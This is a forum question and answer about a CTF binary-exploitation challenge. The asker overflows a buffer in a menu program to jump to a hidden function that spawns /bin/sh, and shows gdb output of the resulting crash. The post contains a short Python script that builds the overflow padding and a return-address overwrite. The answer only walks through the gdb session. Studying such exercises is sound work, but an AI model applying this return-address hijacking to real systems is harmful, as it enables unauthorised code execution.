0

Sorry if this is the wrong format. Im currently doing a CTF and have a problem where i have to overflow a buffer, to get access to a /bin/sh hidden function, where i then can get a flag.

I think i successfully overflow the buffer, but when i would be getting access to the hidden function i get the following output.

[ Zerochain ]
1. Add Note
2. Delete Note
3. View Note
4. Vulnerable Log
5. Exit
Your choice: 
Breakpoint 1, 0x0000000000401570 in vulnerable_log ()
(gdb) x/xg $rbp
0x7fffffffdc30: 0x00007fffffffdc50
(gdb) c
Continuing.
Enter log message: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Breakpoint 2, 0x00000000004015b6 in hidden_shell ()
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x00007ffff7e045d4 in do_system (line=0x402113 "/bin/sh") at ../sysdeps/posix/system.c:148
warning: 148    ../sysdeps/posix/system.c: No such file or directory

Im using gdb to get information from the program.
I have also made the following python program to insert the different data.

import sys
from pwn import * 


padding = b"\x41" * (123+9)
return_adress = b"\x00\x00\x00\x00\x00\xb2\x15\x40"
sys.stdout.buffer.write("4".encode())
sys.stdout.buffer.write(padding+return_adress)

Hope someone can help. If you need more information feel free to ask, since i can both link the file and CTF-problem. Thanks Ahead!

Improve this question
1

1 Answer 1

Reset to default
0

This is probably a menu-driven program (called Zerochain) offering these options:

1. Add Note
2. Delete Note
3. View Note
4. Vulnerable Log
5. Exit

And here’s what's happening in your gdb session:

You triggered Breakpoint 1 at vulnerable_log():

Breakpoint 1, 0x0000000000401570 in vulnerable_log ()

You checked the base pointer (rbp), and it looks like it points to:

0x7fffffffdc30: 0x00007fffffffdc50

Then you continued (c), and entered a very long input for "Enter log message":

AAAAAAAAAA.... (lots of A's)

After that, you hit Breakpoint 2, this time inside hidden_shell():

Breakpoint 2, 0x00000000004015b6 in hidden_shell ()

That suggests your input redirected control flow to this hidden function!

Then you continued again, and the program ran do_system() with the command /bin/sh:

Program received signal SIGSEGV, Segmentation fault.
0x00007ffff7e045d4 in do_system (line=0x402113 "/bin/sh")

So the program was trying to execute a shell , before crashing.

Improve this answer

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.